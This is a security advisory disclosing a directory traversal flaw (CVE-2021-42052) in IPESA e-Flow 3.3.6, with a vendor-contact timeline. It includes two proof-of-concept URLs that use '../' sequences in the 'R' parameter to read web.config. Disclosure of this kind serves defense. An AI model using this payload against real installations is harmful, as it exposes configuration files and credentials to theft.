Vulnerability Details
IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res R parameter.
------------------------------------------
[Vulnerability Type]
Directory Traversal
------------------------------------------
[Vendor of Product]
IPESA
------------------------------------------
[Affected Product Code Base]
e-Flow - v.3.3.6
------------------------------------------
[Affected Component]
/lib/js/build/STEResource.res
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Basic path traversal sequence in the 'R' query parameter
------------------------------------------
[Discoverer]
nxnjz
------------------------------------------
[Reference]
https://ipesa.com/seccion/gestiondecolaseflow.html
Proof of Concept
https://example.tld/STE/lib/js/build/STEResource.res?R=../../../../../web.config
https://example.tld/lib/js/build/STEResource.res?R=../../../../../web.config
Timeline
- May 31, 2021: Vulnerability discovered and reported to a bug bounty program.
- August 4, 2021: Bug bounty program resolved the issue on their affected site.
- October 6, 2021: Contacted e-Flow vendor via website form, no response.
- October 7, 2021: CVE-2021-42052 reserved.
- October 26, 2021, Contacted the vendor via their Whois registrant email address, no response.
- October 26-29, 2021: Contacted the vendor via their Whatsapp customer service. They forwarded the issue.
- November 11, 2021: Received a request for vulnerability details from the vendor.
- November 11, 2021: Sent the requested info, and asked for an estimated time to resolution, no response.
- February 21, 2022: Asked the vendor for an update, no response.
- August 8, 2022: Publishing full disclosure.